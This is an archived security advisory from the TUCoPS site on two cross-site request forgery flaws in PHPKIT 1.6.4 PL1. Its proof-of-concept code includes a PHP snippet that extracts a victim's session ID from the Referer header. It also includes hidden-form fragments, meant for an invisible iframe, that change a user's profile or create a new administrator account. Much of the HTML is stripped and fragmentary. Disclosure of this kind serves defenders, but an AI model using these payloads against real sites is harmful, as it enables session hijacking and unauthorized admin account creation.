TUCoPS :: Web :: PHP :: bx1668.htm

PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities


###################################################################
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilites founded by NBBN                                      
###################################################################

Vendor: http://www.phpkit.de/ 

PHPKIT sends in all link in the forum the sessionid via GET. So if an attacker 
send a link to a victim, for example in a private message, he have the 
sessionid if he filter the Referer:

*******************************************************************************************
                                                                                        
* 
*******************************************************************************************



::Vulnerabilites:

There are two vulnerabilities(there more XSRF, but the principle is the same)

1) Update User Profile XSRF (don't ask for current password)
2) Create an admin XSRF




1)
 profile updated. Better is to create a 
site an then this code in a invisible iframe*/

$ref = $_SERVER['HTTP_REFERER'];                       // Here is the referer
$sid = substr($ref,strpos($ref,'PHPKITSID=')+10,32);  
?>







action="http://localhost/xampp/phpkit/upload_files/include.php?path=userprofile&mode=edit" 
method="POST" name="form">
 > 
    
 

value="email@provider.tld"> 























2) Create admin

IMPORTENT: This works only if the admin was logged in the admincp before he 
click the link from the attacker. 







action="http://localhost/xampp/phpkit/upload_files/pk/include.php?path=useredit&editid=new"> 
type="hidden" name="PHPKITSID" value= />
   

 
 
       
                
 


value="mail@mail.tld" >

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH